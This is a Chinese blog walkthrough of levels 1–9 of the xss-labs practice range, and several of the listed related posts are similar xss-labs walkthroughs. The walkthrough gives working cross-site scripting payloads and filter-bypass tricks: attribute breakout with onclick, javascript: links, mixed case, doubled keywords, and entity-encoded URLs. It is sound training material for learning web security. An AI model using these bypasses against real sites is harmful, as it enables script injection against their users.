【XSS】xss-labs 靶场通关(1-9)

于 2024-08-31 18:37:14 发布
阅读量749 收藏 4
点赞数 14
分类专栏: # XSS web安全 文章标签: xss 前端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71944965/article/details/141754036
版权

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦

【XSS】xss-labs 靶场通关(1-9)

第一关 level1

查看网站源码,可以发现get传参name的值test插入了html里头
在这里插入图片描述

直接在url后加上JS语句即可
在这里插入图片描述

<script>alert(1)</script>

第二关 lever2

查看网页源码发现和第一关差不多,先在url后加上JS语句试试
发现报错
在这里插入图片描述
再次查看源码,发现JS语句被包在" "中没有执行
在这里插入图片描述
应该闭合" "
在这里插入图片描述

"> <script>alert(1)</script>

第三关 level3

先输入123456,然后查看网站源码
在这里插入图片描述
所以还是闭合问题,输入第二题的JS语言试试
发现报错
在这里插入图片描述
用单引号'闭合试试,还是报错,检查源代码
发现符号被过滤
在这里插入图片描述
我们可以利用onclick绕过<>号的过滤来达到执行js的目的

在文本框输入:

' οnclick='javascript:alert(1)

在这里插入图片描述
再次点击文本框即可触发绕过通关

第四关 level4

查看网页源码,发现还是input 的双引号" "闭合

在这里插入图片描述
将第三关的单引号换成双引号,再次点击文本框即可触发绕过通关

" οnclick="javascript:alert(1)

第五关 level5

查看源代码,先用上一题的绕过语句试试

在这里插入图片描述
插入语句后发现原本的onclick被替换成o_nclick,而且双引号"被过滤
在这里插入图片描述
所以我们用超链接注入

"> <a href="javascript:alert(1)">level5</a>

在这里插入图片描述
点击level5即可通关

第六关 level6

查看源代码发现和前几关一样,随便输入先试试过滤了些什么

"> <a href="javascript:alert(1)">level5</a>

果然报错,查看源代码
发现符号全被过滤
在这里插入图片描述
用大小写绕过试试

"> <a hREf="javascript:alert(1)">level6</a>

发现成功绕过
在这里插入图片描述
点击level6即可通关

第七关 level7

源码和之前一样,先随便输入看看

" > <a hREF="javascript:alert(1)">level7</a>

发现还是符号全过滤,hERFscript也被删掉了
在这里插入图片描述
我们可以用双写绕过

例:
script写作scrscriptipt
相当于scr(script)ipt,中间的script被删掉后两边的字母又可以拼接成一个script

" > <a hrhrefef="javascrscriptipt:alert(1)">level7</a>

这里是将 herf 和 script 做了双写绕过

成功绕过:
在这里插入图片描述

第八关 level8

先随便输入看看

" > <a hREF="javascrscriptipt:alert(1)">level7</a>

查看源码发现输入的值插入了两个地方
符号被过滤,hrefscript插入下划线,下方存在一个a href,大写字母被替换为小写
在这里插入图片描述
我们可以试着插入一段js伪协议

javascript:alert(1)

在线Unicode编码解码 - 码工具进行Unicode编码

在这里插入图片描述
在文本框输入Unicode编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

在这里插入图片描述
点击友情链接即可

第九关 level9

先随便输入看看

" > <a hREF="javascrscriptipt:alert(1)">level9</a>

发现href未插入成功

在这里插入图片描述
链接不合法就插入一个合法链接(向传入的值里面添加http://)

http://用注释符注释掉,即/* http:// */

用Unicode编码后插入

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

在这里插入图片描述
点击友情链接即可

点燃银河尽头的篝火(●'◡'●)
关注
  • 14
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5264
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS漏洞:xss-labs靶场通关
qq_68163788的博客
01-16 2658
xss-lab是一个旨在帮助安全研究人员、开发人员和安全爱好者学习和理解跨站脚本攻击(XSS)的项目。它通常包括一系列设计精良的实验室环境,用于模拟真实世界中可能遇到的XSS漏洞场景。这些实验室环境通常包括各种不同类型和难度级别的XSS漏洞,以帮助学习者逐步提高他们的技能。 通过xss-lab项目,用户可以学习如何利用XSS漏洞来攻击网站、窃取用户信息、执行恶意代码等。同时,用户也可以学习如何防御和修复这些漏洞,从而提高网站的安全性。 xss-lab项目的目的是通过实践操作的方式来加深对XSS攻击的理解
XSS-labs靶场通关
Fly_Mojito的博客
06-06 888
XSS-labs靶场通关
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-23 1809
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
记录自己在xss-labs靶场通关记录
2302_78903258的博客
06-08 1432
我们下载完之后,就可以进行xss-labs-master的搭建,我本人下载的phpstudy是2018年版的将xss-labs-master安装完之后,放到此目录下,我们原本下载的xss-labs-master,我们可以将,便于我们做题时的搜索对于新版本的phpstudy来说,我们可以将xss-labs-master放到此目录下。访问本地配置的xss-labs。
XSS-labs 靶场通关总结(下)
m0_61506558的博客
08-12 364
原理。
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 3万+
xss靶场一到二十关通关详细教程
xss-labs靶场通关
m0_52051132的博客
10-15 1626
在这里关于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs点击图片开始你的xss之旅吧!
XSS漏洞-05】XSS-labs靶场通关大挑战
m0_64378913的博客
05-31 2865
目录1 实验简介2 XSS通关过程2.0 通关前注意2.1 关卡12.2 关卡22.3 关卡32.4 关卡42.5 关卡52.6 关卡62.7 关卡72.8 关卡82.9 关卡92.10 关卡102.11 关卡112.12 关卡122.13 关卡133 总结 1 实验简介 实验网站/靶场:http://test.ctf8.com/。 实验目的: 熟悉XSS漏洞测试的过程; 判断是否过滤与过滤规则; 练习XSS语句构造与绕过方法; 一边练习一边结合SQL注入进行比较; 一边练习一边思考编码与转码,后续补充这
xss-labs靶场通关
m0_70349048的博客
02-27 1282
我们发现,当我们更改name等于不同的值时,有不同的返回结果,因此在这里可能有xss漏洞然后直接进行测试,在name后面加入xss攻击语句。
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs靶场实战通关教程】
AuroraMiraitowa的博客
03-09 1103
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。
XSS-Jquery.html()+DOM破坏
qq_51502737的博客
08-26 484
利用了浏览器对HTML和CSS解析的容错性。巧妙地利用了嵌套的和标签,让过滤器漏掉了恶意代码。通过混淆和编码的手段避开了部分过滤机制,使得恶意代码最终在用户的浏览器中执行。这是一种典型的基于XSS的攻击,展示了如何通过不同方式绕过安全措施执行JavaScript代码。
Web攻击-XSS、CSRF、SQL注入
m0_63882057的博客
08-30 520
对浏览器中常见的web攻击方式:XSS、CSRF、SQL注入进行了总结和梳理。
[Meachines] [Insane] Bankrobber XSS-MDOG+SQLI+XSRF+Local-RCE+Bankv2转账模拟应用缓冲区溢出
最新发布
08-30 1186
#XSS-MDOG #SQLI #XSRF #Local-RCE #Bankv2转账模拟应用缓冲区溢出
JavaScript代码片段
weixin_66128399的博客
08-26 2394
使用场景是:后端列表查询接口,某个字段前端不传,后端就不根据那个字段筛选,例如name不传的话,就只根据page和pageSize筛选,但是前端查询参数的时候(vue或者react)中,往往会这样定义。给后端发送数据的时候,要判断某个属性是不是空字符串,然后给后端拼参数,这块逻辑抽离出来就是cleanObject,代码实现如下。leading-true,trailing-true:在延时开始时就调用,延时结束后也会调用。//第一个参数指定位数,第二个字符串指定字符,都是可选参数,如果都不传,默认生成8位。
Window Performance API
Bruce__taotao的博客
08-28 1414
Window Performance API 是一组浏览器提供的接口,用于收集和分析网页性能数据。它允许开发者精确地测量网页加载时间、资源加载时间、用户交互延迟等性能指标,从而优化用户体验。1. 主要接口1.1返回一个高精度时间戳,通常用于计算精确的时间差。例如,你可以用它来测量函数执行时间。使用场景: 精确计算代码段的执行时间。// 执行某个任务console.log(`执行时间:${// 执行某个任务 const end = performance . now();
前端的面试题
本人小可爱
08-30 118
【代码】前端的面试题。
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取用户敏感信息或在用户浏览器中执行恶意操作。 通常,成功通过XSS-labs靶场的关键是了解XSS漏洞的原理和常见的防御措施。你可以通过学习相关的网络安全知识和参加相关的训练课程来提高对XSS漏洞的理解和攻防能力。同时,使用漏洞扫描工具和安全审计工具,如Burp Suite、OWASP ZAP等,可以帮助你发现并修复可能存在的XSS漏洞。 请记住,在进行任何安全测试或攻击前,确保获得合法的授权,并遵守适用的法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值